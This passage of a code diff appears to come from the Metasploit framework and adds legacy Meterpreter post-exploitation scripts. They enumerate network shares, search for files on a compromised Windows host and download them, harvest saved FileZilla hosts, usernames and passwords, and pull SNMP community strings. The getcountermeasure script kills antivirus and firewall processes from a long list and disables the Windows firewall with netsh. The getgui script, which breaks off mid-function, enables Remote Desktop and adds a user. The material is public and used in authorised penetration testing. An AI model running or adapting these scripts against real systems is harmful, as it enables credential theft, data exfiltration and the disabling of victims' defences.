+        print_status("\t#{name}: #{val}") if name =~ /Path|Type/
72
+      end
73
+      print_status()
74
+    end
75
+  end
76
+end
77
+
78
+if client.platform =~ /win32|64/
79
+  # Variables to hold info
80
+  mount_history = []
81
+  run_history = []
82
+
83
+  # Enumerate shares being offered
84
+  enum_conf_shares()
85
+
86
+  if not is_system?
87
+    mount_history = enum_recent_mounts("HKEY_CURRENT_USER")
88
+    run_history = enum_run_unc("HKEY_CURRENT_USER")
89
+  else
90
+    user_sid = []
91
+    key = "HKU\\"
92
+    root_key, base_key = client.sys.registry.splitkey(key)
93
+    open_key = client.sys.registry.open_key(root_key, base_key)
94
+    keys = open_key.enum_key
95
+    keys.each do |k|
96
+      user_sid << k if k =~ /S-1-5-21-\d*-\d*-\d*-\d{3,6}$/
97
+    end
98
+    user_sid.each do |us|
99
+      mount_history = mount_history + enum_recent_mounts("HKU\\#{us.chomp}")
100
+      run_history = run_history + enum_run_unc("HKU\\#{us.chomp}")
101
+    end
102
+  end
103
+
104
+  # Enumerate Mount History
105
+  if mount_history.length > 0
106
+    print_status("Recent Mounts found:")
107
+    mount_history.each do |i|
108
+      print_status("\t#{i}")
109
+    end
110
+    print_status()
111
+  end
112
+
113
+  #Enumerate UNC Paths entered in the Dialog box
114
+  if run_history.length > 0
115
+    print_status("Recent UNC paths entered in Run Dialog found:")
116
+    run_history.each do |i|
117
+      print_status("\t#{i}")
118
+    end
119
+    print_status()
120
+  end
121
+else
122
+  print_error("This version of Meterpreter is not supported with this Script!")
123
+  raise Rex::Script::Completed
124
+end

+ 87
- 0
scripts/meterpreter/file_collector.rb View File

@@ -0,0 +1,87 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+# Author: Carlos Perez at carlos_perez[at]darkoperator.com
9
+#-------------------------------------------------------------------------------
10
+@client = client
11
+location = nil
12
+search_blob = []
13
+input_file = nil
14
+output_file = nil
15
+recurse = false
16
+logs = nil
17
+@opts = Rex::Parser::Arguments.new(
18
+  "-h" => [false, "Help menu." ],
19
+  "-i" => [true, "Input file with list of files to download, one per line."],
20
+  "-d" => [true, "Directory to start search on, search will be recursive."],
21
+  "-f" => [true, "Search blobs separated by a |."],
22
+  "-o" => [true, "Output File to save the full path of files found."],
23
+  "-r" => [false, "Search subdirectories."],
24
+  "-l" => [true, "Location where to save the files."]
25
+)
26
+# Function for displaying help message
27
+def usage
28
+  print_line "Meterpreter Script for searching and downloading files that"
29
+  print_line "match a specific pattern. First save files to a file, edit and"
30
+  print_line("use that same file to download the choosen files.")
31
+  print_line(@opts.usage)
32
+  raise Rex::Script::Completed
33
+end
34
+
35
+# Check that we are running under the right type of Meterpreter
36
+if client.platform =~ /win32|win64/
37
+  # Parse the options
38
+  if args.length > 0
39
+    @opts.parse(args) { |opt, idx, val|
40
+      case opt
41
+      when "-h"
42
+        usage
43
+      when "-i"
44
+        input_file = val
45
+      when "-o"
46
+        output_file = val
47
+      when "-d"
48
+        location = val
49
+      when "-f"
50
+        search_blob = val.split("|")
51
+      when "-r"
52
+        recurse = true
53
+      when "-l"
54
+        logs = val
55
+      end
56
+    }
57
+    # Search for files and save their location if specified
58
+    if search_blob.length > 0 and location
59
+      search_blob.each do |s|
60
+        print_status("Searching for #{s}")
61
+        results = @client.fs.file.search(location,s,recurse)
62
+        results.each do |file|
63
+          print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
64
+          file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
65
+        end
66
+      end
67
+    end
68
+    # Read log file and download those files found
69
+    if input_file and logs
70
+      if ::File.exist?(input_file)
71
+        print_status("Reading file #{input_file}")
72
+        print_status("Downloading to #{logs}")
73
+        ::File.open(input_file, "r").each_line do |line|
74
+          print_status("\tDownloading #{line.chomp}")
75
+          @client.fs.file.download(logs, line.chomp)
76
+        end
77
+      else
78
+        print_error("File #{input_file} does not exist!")
79
+      end
80
+    end
81
+  else
82
+    usage
83
+  end
84
+else
85
+  print_error("This version of Meterpreter is not supported with this Script!")
86
+  raise Rex::Script::Completed
87
+end

+ 70
- 0
scripts/meterpreter/get_application_list.rb View File

@@ -0,0 +1,70 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+# Meterpreter script for listing installed applications and their version.
9
+# Provided: carlos_perez[at]darkoperator[dot]com
10
+
11
+#Options and Option Parsing
12
+opts = Rex::Parser::Arguments.new(
13
+  "-h" => [ false, "Help menu." ]
14
+)
15
+
16
+def app_list
17
+  tbl = Rex::Text::Table.new(
18
+    'Header'  => "Installed Applications",
19
+    'Indent'  => 1,
20
+    'Columns' => [
21
+      "Name",
22
+      "Version"
23
+    ])
24
+  appkeys = ['HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
25
+    'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall' ]
26
+  threadnum = 0
27
+  a = []
28
+  appkeys.each do |keyx86|
29
+    soft_keys = registry_enumkeys(keyx86)
30
+    if soft_keys
31
+      soft_keys.each do |k|
32
+        if threadnum < 10
33
+          a.push(::Thread.new {
34
+              begin
35
+                dispnm = registry_getvaldata("#{keyx86}\\#{k}","DisplayName")
36
+                dispversion = registry_getvaldata("#{keyx86}\\#{k}","DisplayVersion")
37
+                if dispnm =~ /\S*/
38
+                  tbl << [dispnm,dispversion]
39
+                end
40
+              rescue
41
+              end
42
+            })
43
+          threadnum += 1
44
+        else
45
+          sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
46
+          threadnum = 0
47
+        end
48
+      end
49
+    end
50
+
51
+
52
+  end
53
+  print_line("\n" + tbl.to_s + "\n")
54
+end
55
+
56
+opts.parse(args) { |opt, idx, val|
57
+  case opt
58
+  when "-h"
59
+    print_line "Meterpreter Script for extracting a list installed applications and their version."
60
+    print_line(opts.usage)
61
+    raise Rex::Script::Completed
62
+
63
+  end
64
+}
65
+if client.platform =~ /win32|win64/
66
+  app_list
67
+else
68
+  print_error("This version of Meterpreter is not supported with this Script!")
69
+  raise Rex::Script::Completed
70
+end

+ 177
- 0
scripts/meterpreter/get_filezilla_creds.rb View File

@@ -0,0 +1,177 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+require "rexml/document"
9
+
10
+#-------------------------------------------------------------------------------
11
+#Options and Option Parsing
12
+opts = Rex::Parser::Arguments.new(
13
+  "-h" => [ false, "Help menu." ],
14
+  "-c" => [ false, "Return credentials." ]
15
+)
16
+
17
+get_credentials=false
18
+
19
+opts.parse(args) { |opt, idx, val|
20
+  case opt
21
+  when "-h"
22
+    print_line "Meterpreter Script for extracting servers and credentials from Filezilla."
23
+    print_line(opts.usage)
24
+    raise Rex::Script::Completed
25
+  when "-c"
26
+    get_credentials=true
27
+  end
28
+}
29
+### If we get here and have none of our flags true, then we'll just
30
+###   get credentials
31
+if !(get_credentials)
32
+  get_credentials=true
33
+end
34
+
35
+#-------------------------------------------------------------------------------
36
+#Set General Variables used in the script
37
+@client = client
38
+os = @client.sys.config.sysinfo['OS']
39
+host = @client.sys.config.sysinfo['Computer']
40
+# Create Filename info to be appended to downloaded files
41
+filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
42
+# Create a directory for the logs
43
+logs = ::File.join(Msf::Config.log_directory, 'filezilla', Rex::FileUtils.clean_path(host + filenameinfo) )
44
+# Create the log directory
45
+::FileUtils.mkdir_p(logs)
46
+#logfile name
47
+dest = Rex::FileUtils.clean_path(logs + "/" + host + filenameinfo + ".txt")
48
+
49
+#-------------------------------------------------------------------------------
50
+#function for checking of FileZilla profile is present
51
+def check_filezilla(path)
52
+  found = nil
53
+  @client.fs.dir.foreach(path) do |x|
54
+    next if x =~ /^(\.|\.\.)$/
55
+    if x =~ (/FileZilla/)
56
+      ### If we find the path, let's return it
57
+      found = path + x
58
+      return found
59
+    end
60
+  end
61
+  return found
62
+end
63
+
64
+#-------------------------------------------------------------------------------
65
+
66
+def extract_saved_creds(path,xml_file)
67
+  accounts_xml = ""
68
+  creds = ""
69
+  print_status("Reading #{xml_file} file...")
70
+  ### modified to use pidgin_path, which already has .purple in it
71
+  account_file = @client.fs.file.new(path + "\\#{xml_file}", "rb")
72
+  until account_file.eof?
73
+    accounts_xml << account_file.read
74
+  end
75
+  account_file.close
76
+  doc = (REXML::Document.new accounts_xml).root
77
+  doc.elements.to_a("//Server").each do |e|
78
+    print_status "\tHost: #{e.elements["Host"].text}"
79
+    creds << "Host: #{e.elements["Host"].text}"
80
+    print_status "\tPort: #{e.elements["Port"].text}"
81
+    creds << "Port: #{e.elements["Port"].text}"
82
+    logon_type = e.elements["Logontype"].text
83
+    if logon_type == "0"
84
+      print_status "\tLogon Type: Anonymous"
85
+      creds << "Logon Type: Anonymous"
86
+    elsif logon_type =~ /1|4/
87
+      print_status "\tUser: #{e.elements["User"].text}"
88
+      creds << "User: #{e.elements["User"].text}"
89
+      print_status "\tPassword: #{e.elements["Pass"].text}"
90
+      creds << "Password: #{e.elements["Pass"].text}"
91
+    elsif logon_type =~ /2|3/
92
+      print_status "\tUser: #{e.elements["User"].text}"
93
+      creds << "User: #{e.elements["User"].text}"
94
+    end
95
+
96
+    proto = e.elements["Protocol"].text
97
+    if  proto == "0"
98
+      print_status "\tProtocol: FTP"
99
+      creds << "Protocol: FTP"
100
+    elsif proto == "1"
101
+      print_status "\tProtocol: SSH"
102
+      creds << "Protocol: SSH"
103
+    elsif proto == "3"
104
+      print_status "\tProtocol: FTPS"
105
+      creds << "Protocol: FTPS"
106
+    elsif proto == "4"
107
+      print_status "\tProtocol: FTPES"
108
+      creds << "Protocol: FTPES"
109
+    end
110
+    print_status ""
111
+    creds << ""
112
+
113
+  end
114
+#
115
+  return creds
116
+end
117
+#-------------------------------------------------------------------------------
118
+#Function to enumerate the users if running as SYSTEM
119
+def enum_users(os)
120
+  users = []
121
+
122
+  path4users = ""
123
+  sysdrv = @client.sys.config.getenv('SystemDrive')
124
+
125
+  if os =~ /7|Vista|2008/
126
+    path4users = sysdrv + "\\users\\"
127
+    path2purple = "\\AppData\\Roaming\\"
128
+  else
129
+    path4users = sysdrv + "\\Documents and Settings\\"
130
+    path2purple = "\\Application Data\\"
131
+  end
132
+
133
+  if is_system?
134
+    print_status("Running as SYSTEM extracting user list..")
135
+    @client.fs.dir.foreach(path4users) do |u|
136
+      userinfo = {}
137
+      next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
138
+      userinfo['username'] = u
139
+      userinfo['userappdata'] = path4users + u + path2purple
140
+      users << userinfo
141
+    end
142
+  else
143
+    userinfo = {}
144
+    uservar = @client.sys.config.getenv('USERNAME')
145
+    userinfo['username'] = uservar
146
+    userinfo['userappdata'] = path4users + uservar + path2purple
147
+    users << userinfo
148
+  end
149
+  return users
150
+end
151
+
152
+################## MAIN ##################
153
+if client.platform =~ /win32|win64/
154
+  print_status("Running Meterpreter FileZilla Credential harvester script")
155
+  print_status("All services are logged at #{dest}")
156
+  enum_users(os).each do |u|
157
+    print_status("Checking if Filezilla profile is present for user :::#{u['username']}:::...")
158
+    ### Find the path (if it exists) for this user,
159
+    filezilla_path = check_filezilla(u['userappdata'])
160
+    if filezilla_path
161
+      print_status("FileZilla profile found!")
162
+      ### modified to use filezilla_path
163
+      xml_cfg_files = ['sitemanager.xml','recentservers.xml']
164
+      if get_credentials
165
+        xml_cfg_files.each do |xml_cfg_file|
166
+          file_local_write(dest,extract_saved_creds(filezilla_path,xml_cfg_file))
167
+        end
168
+      end
169
+
170
+    else
171
+      print_error("Filezilla profile not found!")
172
+    end
173
+  end
174
+else
175
+  print_error("This version of Meterpreter is not supported with this Script!")
176
+  raise Rex::Script::Completed
177
+end

+ 35
- 0
scripts/meterpreter/get_local_subnets.rb View File

@@ -0,0 +1,35 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+# Meterpreter script that display local subnets
9
+# Provided by Nicob <nicob [at] nicob.net>
10
+# Ripped from http://blog.metasploit.com/2006/10/meterpreter-scripts-and-msrt.html
11
+
12
+@@exec_opts = Rex::Parser::Arguments.new(
13
+  "-h" => [ false, "Help menu." ]
14
+)
15
+def usage
16
+  print_line("Get a list of local subnets based on the host's routes")
17
+  print_line("USAGE: run get_local_subnets")
18
+  print_line(@@exec_opts.usage)
19
+  raise Rex::Script::Completed
20
+end
21
+
22
+@@exec_opts.parse(args) { |opt, idx, val|
23
+  case opt
24
+  when "-h"
25
+    usage
26
+  end
27
+}
28
+
29
+client.net.config.each_route { |route|
30
+  # Remove multicast and loopback interfaces
31
+  next if route.subnet =~ /^(224\.|127\.)/
32
+  next if route.subnet == '0.0.0.0'
33
+  next if route.netmask == '255.255.255.255'
34
+  print_line("Local subnet: #{route.subnet}/#{route.netmask}")
35
+}

+ 64
- 0
scripts/meterpreter/get_valid_community.rb View File

@@ -0,0 +1,64 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+#copied getvncpw - thanks grutz/carlos
9
+
10
+session = client
11
+
12
+@@exec_opts = Rex::Parser::Arguments.new(
13
+  "-h" => [ false, "Help menu."]
14
+)
15
+
16
+def usage()
17
+  print("\nPull the SNMP community string from a Windows Meterpreter session\n\n")
18
+  completed
19
+end
20
+
21
+def get_community(session)
22
+  key = "HKLM\\System\\CurrentControlSet\\Services\\SNMP\\Parameters\\ValidCommunities"
23
+  root_key, base_key = session.sys.registry.splitkey(key)
24
+  open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
25
+  begin
26
+    # oddly enough this does not return the data field which indicates ro/rw
27
+    return open_key.enum_value.collect {|x| x.name}
28
+  rescue
29
+    # no registry key found or other error
30
+    return nil
31
+  end
32
+end
33
+
34
+@@exec_opts.parse(args) { |opt, idx, val|
35
+  case opt
36
+  when "-h"
37
+    usage
38
+  end
39
+}
40
+
41
+if client.platform =~ /win32|win64/
42
+  print_status("Searching for community strings...")
43
+  strs = get_community(session)
44
+  if strs
45
+    strs.each do |str|
46
+      print_good("FOUND: #{str}")
47
+      @client.framework.db.report_auth_info(
48
+        :host	=> client.sock.peerhost,
49
+        :port	=> 161,
50
+        :proto	=> 'udp',
51
+        :sname	=> 'snmp',
52
+        :user	=> '',
53
+        :pass	=> str,
54
+        :type	=> "snmp.community",
55
+        :duplicate_ok	=> true
56
+      )
57
+    end
58
+  else
59
+    print_status("Not found")
60
+  end
61
+else
62
+  print_error("This version of Meterpreter is not supported with this Script!")
63
+  raise Rex::Script::Completed
64
+end

+ 381
- 0
scripts/meterpreter/getcountermeasure.rb View File

@@ -0,0 +1,381 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+#
9
+# Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
10
+# Provides also the option to kill the processes of detected products and disable the built-in firewall.
11
+# Provided by Carlos Perez at carlos_perez[at]darkoperator.com
12
+# Version: 0.1.0
13
+session = client
14
+@@exec_opts = Rex::Parser::Arguments.new(
15
+  "-h" => [ false, "Help menu." ],
16
+  "-k" => [ false, "Kill any AV, HIPS and Third Party Firewall process found." ],
17
+  "-d" => [ false, "Disable built in Firewall" ]
18
+)
19
+
20
+def usage
21
+  print_line("Getcountermeasure -- List (or optionally, kill) HIPS and AV")
22
+  print_line("processes, show XP firewall rules, and display DEP and UAC")
23
+  print_line("policies")
24
+  print(@@exec_opts.usage)
25
+  raise Rex::Script::Completed
26
+end
27
+
28
+#-------------------------------------------------------------------------------
29
+avs = %W{
30
+  a2adguard.exe
31
+  a2adwizard.exe
32
+  a2antidialer.exe
33
+  a2cfg.exe
34
+  a2cmd.exe
35
+  a2free.exe
36
+  a2guard.exe
37
+  a2hijackfree.exe
38
+  a2scan.exe
39
+  a2service.exe
40
+  a2start.exe
41
+  a2sys.exe
42
+  a2upd.exe
43
+  aavgapi.exe
44
+  aawservice.exe
45
+  aawtray.exe
46
+  ad-aware.exe
47
+  ad-watch.exe
48
+  alescan.exe
49
+  anvir.exe
50
+  ashdisp.exe
51
+  ashmaisv.exe
52
+  ashserv.exe
53
+  ashwebsv.exe
54
+  aswupdsv.exe
55
+  atrack.exe
56
+  avgagent.exe
57
+  avgamsvr.exe
58
+  avgcc.exe
59
+  avgctrl.exe
60
+  avgemc.exe
61
+  avgnt.exe
62
+  avgtcpsv.exe
63
+  avguard.exe
64
+  avgupsvc.exe
65
+  avgw.exe
66
+  avkbar.exe
67
+  avk.exe
68
+  avkpop.exe
69
+  avkproxy.exe
70
+  avkservice.exe
71
+  avktray
72
+  avktray.exe
73
+  avkwctl
74
+  avkwctl.exe
75
+  avmailc.exe
76
+  avp.exe
77
+  avpm.exe
78
+  avpmwrap.exe
79
+  avsched32.exe
80
+  avwebgrd.exe
81
+  avwin.exe
82
+  avwupsrv.exe
83
+  avz.exe
84
+  bdagent.exe
85
+  bdmcon.exe
86
+  bdnagent.exe
87
+  bdss.exe
88
+  bdswitch.exe
89
+  blackd.exe
90
+  blackice.exe
91
+  blink.exe
92
+  boc412.exe
93
+  boc425.exe
94
+  bocore.exe
95
+  bootwarn.exe
96
+  cavrid.exe
97
+  cavtray.exe
98
+  ccapp.exe
99
+  ccevtmgr.exe
100
+  ccimscan.exe
101
+  ccproxy.exe
102
+  ccpwdsvc.exe
103
+  ccpxysvc.exe
104
+  ccsetmgr.exe
105
+  cfgwiz.exe
106
+  cfp.exe
107
+  clamd.exe
108
+  clamservice.exe
109
+  clamtray.exe
110
+  cmdagent.exe
111
+  cpd.exe
112
+  cpf.exe
113
+  csinsmnt.exe
114
+  dcsuserprot.exe
115
+  defensewall.exe
116
+  defensewall_serv.exe
117
+  defwatch.exe
118
+  f-agnt95.exe
119
+  fpavupdm.exe
120
+  f-prot95.exe
121
+  f-prot.exe
122
+  fprot.exe
123
+  fsaua.exe
124
+  fsav32.exe
125
+  f-sched.exe
126
+  fsdfwd.exe
127
+  fsm32.exe
128
+  fsma32.exe
129
+  fssm32.exe
130
+  f-stopw.exe
131
+  f-stopw.exe
132
+  fwservice.exe
133
+  fwsrv.exe
134
+  iamstats.exe
135
+  iao.exe
136
+  icload95.exe
137
+  icmon.exe
138
+  idsinst.exe
139
+  idslu.exe
140
+  inetupd.exe
141
+  irsetup.exe
142
+  isafe.exe
143
+  isignup.exe
144
+  issvc.exe
145
+  kav.exe
146
+  kavss.exe
147
+  kavsvc.exe
148
+  klswd.exe
149
+  kpf4gui.exe
150
+  kpf4ss.exe
151
+  livesrv.exe
152
+  lpfw.exe
153
+  mcagent.exe
154
+  mcdetect.exe
155
+  mcmnhdlr.exe
156
+  mcrdsvc.exe
157
+  mcshield.exe
158
+  mctskshd.exe
159
+  mcvsshld.exe
160
+  mghtml.exe
161
+  mpftray.exe
162
+  msascui.exe
163
+  mscifapp.exe
164
+  msfwsvc.exe
165
+  msgsys.exe
166
+  msssrv.exe
167
+  navapsvc.exe
168
+  navapw32.exe
169
+  navlogon.dll
170
+  navstub.exe
171
+  navw32.exe
172
+  nisemsvr.exe
173
+  nisum.exe
174
+  nmain.exe
175
+  noads.exe
176
+  nod32krn.exe
177
+  nod32kui.exe
178
+  nod32ra.exe
179
+  npfmntor.exe
180
+  nprotect.exe
181
+  nsmdtr.exe
182
+  oasclnt.exe
183
+  ofcdog.exe
184
+  opscan.exe
185
+  ossec-agent.exe
186
+  outpost.exe
187
+  paamsrv.exe
188
+  pavfnsvr.exe
189
+  pcclient.exe
190
+  pccpfw.exe
191
+  pccwin98.exe
192
+  persfw.exe
193
+  protector.exe
194
+  qconsole.exe
195
+  qdcsfs.exe
196
+  rtvscan.exe
197
+  sadblock.exe
198
+  safe.exe
199
+  sandboxieserver.exe
200
+  savscan.exe
201
+  sbiectrl.exe
202
+  sbiesvc.exe
203
+  sbserv.exe
204
+  scfservice.exe
205
+  sched.exe
206
+  schedm.exe
207
+  scheduler daemon.exe
208
+  sdhelp.exe
209
+  serv95.exe
210
+  sgbhp.exe
211
+  sgmain.exe
212
+  slee503.exe
213
+  smartfix.exe
214
+  smc.exe
215
+  snoopfreesvc.exe
216
+  snoopfreeui.exe
217
+  spbbcsvc.exe
218
+  sp_rsser.exe
219
+  spyblocker.exe
220
+  spybotsd.exe
221
+  spysweeper.exe
222
+  spysweeperui.exe
223
+  spywareguard.dll
224
+  spywareterminatorshield.exe
225
+  ssu.exe
226
+  steganos5.exe
227
+  stinger.exe
228
+  swdoctor.exe
229
+  swupdate.exe
230
+  symlcsvc.exe
231
+  symundo.exe
232
+  symwsc.exe
233
+  symwscno.exe
234
+  tcguard.exe
235
+  tds2-98.exe
236
+  tds-3.exe
237
+  teatimer.exe
238
+  tgbbob.exe
239
+  tgbstarter.exe
240
+  tsatudt.exe
241
+  umxagent.exe
242
+  umxcfg.exe
243
+  umxfwhlp.exe
244
+  umxlu.exe
245
+  umxpol.exe
246
+  umxtray.exe
247
+  usrprmpt.exe
248
+  vetmsg9x.exe
249
+  vetmsg.exe
250
+  vptray.exe
251
+  vsaccess.exe
252
+  vsserv.exe
253
+  wcantispy.exe
254
+  win-bugsfix.exe
255
+  winpatrol.exe
256
+  winpatrolex.exe
257
+  wrsssdk.exe
258
+  xcommsvr.exe
259
+  xfr.exe
260
+  xp-antispy.exe
261
+  zegarynka.exe
262
+  zlclient.exe
263
+}
264
+#-------------------------------------------------------------------------------
265
+# Check for the presence of AV, HIPS and Third Party firewall and/or kill the
266
+# processes associated with it
267
+def check(session,avs,killbit)
268
+  print_status("Checking for contermeasures...")
269
+  session.sys.process.get_processes().each do |x|
270
+    if (avs.index(x['name'].downcase))
271
+      print_status("\tPossible countermeasure found #{x['name']} #{x['path']}")
272
+      if (killbit)
273
+        print_status("\tKilling process for countermeasure.....")
274
+        session.sys.process.kill(x['pid'])
275
+      end
276
+    end
277
+  end
278
+end
279
+#-------------------------------------------------------------------------------
280
+# Get the configuration and/or disable the built in Windows Firewall
281
+def checklocalfw(session,killfw)
282
+  print_status("Getting Windows Built in Firewall configuration...")
283
+  opmode = ""
284
+  r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode", nil, {'Hidden' => 'true', 'Channelized' => true})
285
+  while(d = r.channel.read)
286
+    opmode << d
287
+  end
288
+  r.channel.close
289
+  r.close
290
+  opmode.split("\n").each do |o|
291
+    print_status("\t#{o}")
292
+  end
293
+  if (killfw)
294
+    print_status("Disabling Built in Firewall.....")
295
+    f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
296
+    while(d = f.channel.read)
297
+      if d =~ /The requested operation requires elevation./
298
+        print_status("\tUAC or Insufficient permissions prevented the disabling of Firewall")
299
+      end
300
+    end
301
+    f.channel.close
302
+    f.close
303
+  end
304
+end
305
+#-------------------------------------------------------------------------------
306
+# Function for getting the current DEP Policy on the Windows Target
307
+def checkdep(session)
308
+  tmpout = ""
309
+  depmode = ""
310
+  # Expand environment %TEMP% variable
311
+  tmp = session.sys.config.getenv('TEMP')
312
+  # Create random name for the wmic output
313
+  wmicfile = sprintf("%.5d",rand(100000))
314
+  wmicout = "#{tmp}\\#{wmicfile}"
315
+  print_status("Checking DEP Support Policy...")
316
+  r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true})
317
+  sleep(2)
318
+  r.close
319
+  r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true})
320
+    while(d = r.channel.read)
321
+      tmpout << d
322
+    end
323
+  r.channel.close
324
+  r.close
325
+  session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true})
326
+  depmode = tmpout.scan(/(\d)/)
327
+  if depmode.to_s == "0"
328
+    print_status("\tDEP is off for the whole system.")
329
+  elsif depmode.to_s == "1"
330
+    print_status("\tFull DEP coverage for the whole system with no exceptions.")
331
+  elsif depmode.to_s == "2"
332
+    print_status("\tDEP is limited to Windows system binaries.")
333
+  elsif depmode.to_s == "3"
334
+    print_status("\tDEP is on for all programs and services.")
335
+  end
336
+
337
+end
338
+#-------------------------------------------------------------------------------
339
+def checkuac(session)
340
+  print_status("Checking if UAC is enabled ...")
341
+  key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
342
+  root_key, base_key = session.sys.registry.splitkey(key)
343
+  value = "EnableLUA"
344
+  open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
345
+  v = open_key.query_value(value)
346
+  if v.data == 1
347
+    print_status("\tUAC is Enabled")
348
+  else
349
+    print_status("\tUAC is Disabled")
350
+  end
351
+end
352
+
353
+################## MAIN ##################
354
+killbt = false
355
+killfw = false
356
+@@exec_opts.parse(args) { |opt, idx, val|
357
+  case opt
358
+  when "-k"
359
+    killbt = true
360
+  when "-d"
361
+    killfw = true
362
+  when "-h"
363
+    usage
364
+  end
365
+}
366
+# get the version of windows
367
+if client.platform =~ /win32|win64/
368
+  wnvr = session.sys.config.sysinfo["OS"]
369
+  print_status("Running Getcountermeasure on the target...")
370
+  check(session,avs,killbt)
371
+  if wnvr !~ /Windows 2000/
372
+    checklocalfw(session, killfw)
373
+    checkdep(session)
374
+  end
375
+  if wnvr =~ /Windows Vista/
376
+    checkuac(session)
377
+  end
378
+else
379
+  print_error("This version of Meterpreter is not supported with this Script!")
380
+  raise Rex::Script::Completed
381
+end

+ 190
- 0
scripts/meterpreter/getgui.rb View File

@@ -0,0 +1,190 @@
1
+##
2
+# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
+# If you'd like to imporve this script, please try to port it as a post
4
+# module instead. Thank you.
5
+##
6
+
7
+
8
+# Author: Carlos Perez at carlos_perez[at]darkoperator.com
9
+#-------------------------------------------------------------------------------
10
+################## Variable Declarations ##################
11
+
12
+session = client
13
+host_name = client.sys.config.sysinfo['Computer']
14
+# Create Filename info to be appended to downloaded files
15
+filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
16
+
17
+# Create a directory for the logs
18
+logs = ::File.join(Msf::Config.log_directory,'scripts', 'getgui')
19
+
20
+# Create the log directory
21
+::FileUtils.mkdir_p(logs)
22
+
23
+# Cleaup script file name
24
+@dest = logs + "/clean_up_" + filenameinfo + ".rc"
25
+
26
+@@exec_opts = Rex::Parser::Arguments.new(
27
+  "-h" => [ false, "Help menu." ],
28
+  "-e" => [ false, "Enable RDP only." ],
29
+  "-p" => [ true,  "The Password of the user to add." ],
30
+  "-u" => [ true,  "The Username of the user to add." ],
31
+  "-f" => [ true,  "Forward RDP Connection." ]
32
+)
33
+def usage
34
+  print_line("Windows Remote Desktop Enabler Meterpreter Script")
35
+  print_line("Usage: getgui -u <username> -p <password>")
36
+  print_line("Or:    getgui -e")
37
+  print(@@exec_opts.usage)
38
+  raise Rex::Script::Completed
39
+end
40
+
41
+
42
+
43
+
44
+def enablerd()
45
+  key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server'
46
+  value = "fDenyTSConnections"
47
+  begin
48
+    v = registry_getvaldata(key,value)
49
+    print_status "Enabling Remote Desktop"
50
+    if v == 1
51
+      print_status "\tRDP is disabled; enabling it ..."
52
+      registry_setvaldata(key,value,0,"REG_DWORD")
53
+      file_local_write(@dest,"reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"")
54
+    else
55
+      print_status "\tRDP is already enabled"
56
+    end
57
+  rescue::Exception => e
58